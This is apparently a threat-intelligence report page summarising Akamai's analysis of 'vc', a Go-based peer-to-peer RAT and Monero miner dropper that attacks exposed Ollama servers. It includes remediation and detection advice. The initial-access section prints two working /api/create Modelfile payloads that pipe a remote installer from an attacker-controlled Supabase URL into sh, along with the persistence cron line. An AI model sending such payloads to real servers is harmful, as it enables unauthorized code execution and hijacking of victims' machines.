Threat reportMalwareTL-2026-0553

Stealthy P2P Cryptominer Targeting Ollama Endpoints — Custom Go-Based 'vc' RAT/Dropper (Akamai SIRT)

highACTIVE

Stealthy P2P Cryptominer Targeting Ollama Endpoints (TL-2026-0553), also tracked as vc cryptominer, is a high-severity malware campaign, first published 2026-05-21. It has no confirmed attribution, affects Ollama Ollama, maps to 23 MITRE ATT&CK techniques (T1027.002, T1036.003, T1036.005), and is covered by 9 detection rules and 28 indicators of compromise.

Severity
HIGHAssessed severity
CVEs
0None referenced
Techniques
23MITRE ATT&CK
Actors
0Not attributed
Detection rules
9SPL · KQL · Sigma
IOCs
28Indicators of compromise

Key facts for TL-2026-0553

Threat ID
TL-2026-0553
Also known as
vc cryptominer, vc RAT, core-node-01
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
Last reviewed
Attribution confidence
NONE
Motivation
FINANCIAL
Target sectors
technology, ai-infrastructure, research, academia, cloud-services
Target regions
Global, North America, Europe, Asia
Detection rules
9
Indicators of compromise
28

Malware and tooling in Stealthy P2P Cryptominer Targeting Ollama Endpoints

Malware and tooling: hydraPersistence, vc, UPX, XMRig, libp2p

How Stealthy P2P Cryptominer Targeting Ollama Endpoints works

Akamai SIRT identified a custom Go-based peer-to-peer Remote Access Trojan named 'vc' that operates as a backdoor and cryptominer dropper targeting exposed Ollama LLM endpoints. The attacker abuses the unauthenticated /api/create endpoint on TCP 11434 with malicious Modelfile payloads (RUN and TEMPLATE+exec injection) to pipe a curl|sh installer (i.sh) into the host, dropping a UPX-packed Go binary that runs as the Ollama process owner. The malware uses a custom libp2p stack (WebRTC, QUIC, DTLS, UPnP) to route Monero (XMRig) mining traffic through a decentralized P2P network, eliminating any single C2 IP/domain to block.

On 2026-05-21 Akamai's Security Intelligence Response Team (Larry Cashdollar) published forensic analysis of a novel custom Go-based malware family observed attacking the SIRT's purpose-built LLM honeypot. The malware, internally named 'vc', is delivered through abuse of legitimate Ollama Modelfile functionality on internet-exposed Ollama servers (default TCP port 11434, no authentication).

Initial Access: The attacker sends a POST to /api/create with one of two crafted Modelfile payloads. Payload 1 uses the RUN directive to execute a curl-piped-to-shell command at model creation time:

{"name":"sys_check","modelfile":"FROM scratch\nRUN curl -sL https://auzhpjmyaqayopaqidmc.supabase.co/storage/v1/object/public/p/i.sh | sh","stream":false}

Payload 2 uses the TEMPLATE directive combined with the Ollama exec() template helper to achieve the same shell command execution at template render time:

{"name":"sys_update","modelfile":"FROM scratch\nTEMPLATE \"{{ .Prompt }} {{ exec \\\"curl -sL https://auzhpjmyaqayopaqidmc.supabase.co/storage/v1/object/public/p/i.sh | sh\\\" }}\"","stream":false}

Both payloads cause the Ollama server to download and execute attacker-controlled shell code as the user account running the Ollama process. The download URL is hosted on a public Supabase storage bucket (auzhpjmyaqayopaqidmc.supabase.co), abusing a legitimate cloud service to evade reputation-based blocking.

Installer Script (i.sh): The shell installer is a minimal failover downloader. It writes the next-stage binary to a RAM-disk path /dev/shm/.sys-update, executes it in the background, and never touches conventional persistent filesystems. Failover logic tries curl, then wget, then a Python 3 urllib.request fallback, ensuring delivery on diverse Linux hosts.

The 'vc' Binary: vc is a custom x86 binary written in Go 1.25.7, UPX-packed, with a deliberately falsified UPX header inserted to disrupt automated unpackers and static analyzers. The unpacked binary embeds a full libp2p decentralized networking stack — the same framework used by IPFS and Filecoin — supporting WebRTC, QUIC, DTLS, and UPnP NAT traversal. There is no traditional C2 server; mining traffic and command channels are multiplexed through a global libp2p mesh, where the malware advertises peer ID 12D3KooWGfRjvTvgfV4eXnFWLV26GG7TciWX7ycBiGPnA7ubVmbG and internal node identifier core-node-01.

Execution Chain (seven steps observed by Akamai): 1) The binary copies itself to /dev/shm/.udev-mesh-node (RAM disk; bypasses disk-based EDR scans). 2) Drops two additional binaries into RAM: /dev/shm/kworker-main (the 21 MB libp2p P2P proxy) and /dev/shm/kworker-run (a 2.6 MB XMRig Monero miner). 3) Renames the main process to kworker-main (matches kernel-thread name convention to evade ps inspection). 4) Starts a local Stratum-style mining proxy on 127.0.0.1:41947, then bridges that proxy through the libp2p mesh to a decentralized mining pool — defeating Stratum-port and pool-IP egress blocks. 5) Launches XMRig with wallet 42qxWtESb9t1jvteBGCJybRiHB2x6fiMmhmosjUxfDsFUMLtJgYheVUaac2dvHrDfwcogpQFbTz4h2GXkB1rxonqUJQnUyz and a 50% CPU cap to remain below noise thresholds. 6) Exposes RAT primitives (arbitrary OS command execution) reachable over the libp2p mesh, executing as the Ollama process owner. 7) Plants a root crontab line for self-healing persistence: */15 * * * * pgrep -x kworker-run || /dev/shm/.udev-mesh-node — relaunching the dropper every 15 minutes if the miner process is missing. Persistence logic is encapsulated in an internal Go function named hydraPersistence.

Defense Evasion Highlights: kworker process masquerade; .udev-mesh-node and .sys-update hidden-file naming; RAM-disk-only execution (no on-disk artifact after i.sh wipes the dropper); fake UPX header; encrypted P2P channel (DTLS); QUIC over UDP/443 blending with normal HTTP/3 egress.

Note on the Underlying Weakness: The Modelfile RUN and TEMPLATE+exec primitives abused here are intended features of the Ollama Modelfile DSL. There is no CVE assigned to the abuse itself; the root cause is internet-exposed Ollama servers bound to 0.0.0.0:11434 without authentication. This same exposure class enabled prior threats including CVE-2024-37032 (ProbLLama, Wiz Research) and the November 2024 Oligo Security cluster (CVE-2024-39719/39720/39721/39722). As of January 2026 (SentinelLABS + Censys) approximately 175,000 unique Ollama instances were exposed worldwide.

MITRE ATT&CK techniques used in TL-2026-0553

Defense Evasion

T1027.002 Obfuscated Files or Information: Software Packing; T1036.003 Rename Legitimate Utilities; T1036.005 Match Legitimate Resource Name or Location; T1070.004 Indicator Removal: File Deletion; T1140 Deobfuscate/Decode Files or Information; T1564.001 Hide Artifacts: Hidden Files and Directories; T1620 Reflective Code Loading; T1622 Debugger Evasion

Persistence

T1053.003 Scheduled Task/Job: Cron

Discovery

T1057 Process Discovery

Execution

T1059.004 Command and Scripting Interpreter: Unix Shell; T1059.006 Command and Scripting Interpreter: Python; T1204 User Execution

Command and Control

T1071.001 Application Layer Protocol: Web Protocols; T1090.001 Proxy: Internal Proxy; T1090.003 Proxy: Multi-hop Proxy; T1095 Non-Application Layer Protocol; T1105 Ingress Tool Transfer; T1573.002 Encrypted Channel: Asymmetric Cryptography

Initial Access

T1190 Exploit Public-Facing Application

Impact

T1496 Resource Hijacking

Resource Development

T1583.006 Acquire Infrastructure: Web Services; T1588.002 Obtain Capabilities: Tool

Affected products and versions in Stealthy P2P Cryptominer Targeting Ollama Endpoints

  • Ollama — Ollama
    Vulnerable versions: any version exposed on 0.0.0.0:11434 without authentication
    Fixed in: mitigated by binding to 127.0.0.1 or fronting with authenticated reverse proxy

Remediation for Stealthy P2P Cryptominer Targeting Ollama Endpoints

Patches

  • Upgrade Ollama to the latest release and enable authentication — Ollama added native access controls; configure OLLAMA_HOST=127.0.0.1 if exposure is unintended

Immediate actions

  • Isolate any host where the vc binary was executed — disconnect from network immediately
  • Inspect /dev/shm for files .udev-mesh-node, .sys-update, kworker-main, kworker-run and remove
  • Audit crontabs (root and all users) for entries containing '/dev/shm/' or 'pgrep -x kworker-run' and remove
  • Audit ~/.bashrc and systemctl units for any references to kworker-main, kworker-run, or /dev/shm artifacts
  • Kill any running processes named kworker-main, kworker-run, or .udev-mesh-node (verify against /proc/<pid>/exe path; legitimate kworker threads have no exe file)
  • Capture a memory dump from compromised hosts before reboot — libp2p peer list and crypto keys may be recoverable from RAM
  • Block outbound UDP/443 (QUIC) and unexpected WebSocket egress at the perimeter to disrupt P2P mesh communication
  • Block outbound traffic to auzhpjmyaqayopaqidmc.supabase.co and cloud-metrics.io

Workarounds

  • Firewall TCP 11434 inbound from untrusted networks
  • Disable or restrict the Modelfile RUN/TEMPLATE+exec primitives via reverse-proxy request inspection if the upstream Ollama version does not provide a configuration knob

Longer-term hardening

  • Never expose Ollama (TCP 11434) directly to the internet — bind to 127.0.0.1 or behind a reverse proxy with authentication
  • Place all internal LLM inference endpoints behind an authenticating gateway (API key, mTLS, or zero-trust proxy)
  • Deploy EDR with behavioral detection for /dev/shm execution, process-name spoofing of kworker, and outbound P2P/libp2p traffic patterns
  • Implement egress filtering allowlists; deny QUIC and WebSocket to non-approved destinations from server workloads
  • Monitor /api/create POST bodies for RUN/TEMPLATE Modelfile directives containing shell commands or exec() helpers — treat any 'FROM scratch' with shell payload as malicious
  • Establish baseline of legitimate cron entries; alert on cron additions referencing /dev/shm or pgrep self-healing patterns
  • Subscribe to Akamai SIRT, Wiz, and Oligo Ollama advisories; track new Ollama CVEs (CVE-2024-37032 / -39719 / -39720 / -39721 / -39722) for patch posture

Weaknesses (CWE) in Stealthy P2P Cryptominer Targeting Ollama Endpoints

CWE-78, CWE-306, CWE-94

Timeline of Stealthy P2P Cryptominer Targeting Ollama Endpoints

  • CVE-2024-37032 (ProbLLama) disclosed by Wiz Research — path-traversal RCE in Ollama /api/pull, /api/push, /api/create endpoints in versions prior to 0.1.34; established the threat model for Ollama-endpoint abuse.
  • Oligo Security publishes 'More Models, More ProbLLMs' disclosing CVE-2024-39719/39720/39721/39722 — additional vulnerabilities in unauthenticated Ollama management endpoints including /api/create.
  • SentinelLABS and Censys ('Operation Bizarre Bazaar') report approximately 175,000 publicly exposed Ollama instances worldwide, none with authentication — the attack surface for the vc dropper.
  • Akamai SIRT honeypot begins recording the /api/create RUN and TEMPLATE+exec payloads delivering the i.sh installer from auzhpjmyaqayopaqidmc.supabase.co (approximate; Akamai blog cites 'recent' observation prior to publication).
  • Threadlinqs Intelligence ingests the threat as TL-2026-0553 with full IOC, MITRE, and detection coverage.
  • Akamai SIRT (Larry Cashdollar) publishes forensic analysis of the vc Go-based P2P RAT/cryptominer dropper, releasing SHA256 hashes for i.sh and vc (packed/unpacked), the libp2p peer ID 12D3KooWGfRjvTvgfV4eXnFWLV26GG7TciWX7ycBiGPnA7ubVmbG, the Monero wallet 42qxWtESb9t1jv..., and recommended mitigations.
  • As of 2026-05-29, the 'vc' Ollama cryptominer/RAT (Akamai SIRT, 2026-05-21) remains active: no CVE, no takedown, and its decentralized libp2p C2 plus public-cloud staging are takedown-resistant by design. The root cause (~175,000 unauthenticated Ollama hosts on 11434) is unpatched and independently confirmed under heavy 2026 exploitation; config-only mitigation (bind 127.0.0.1/auth).

Sources cited for Stealthy P2P Cryptominer Targeting Ollama Endpoints

Detection coverage for TL-2026-0553

As of 2026-05-21, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0553 across Splunk SPL, Microsoft KQL and Sigma, covering 28 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
28 indicators of compromise · Red and above. Compare plans

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats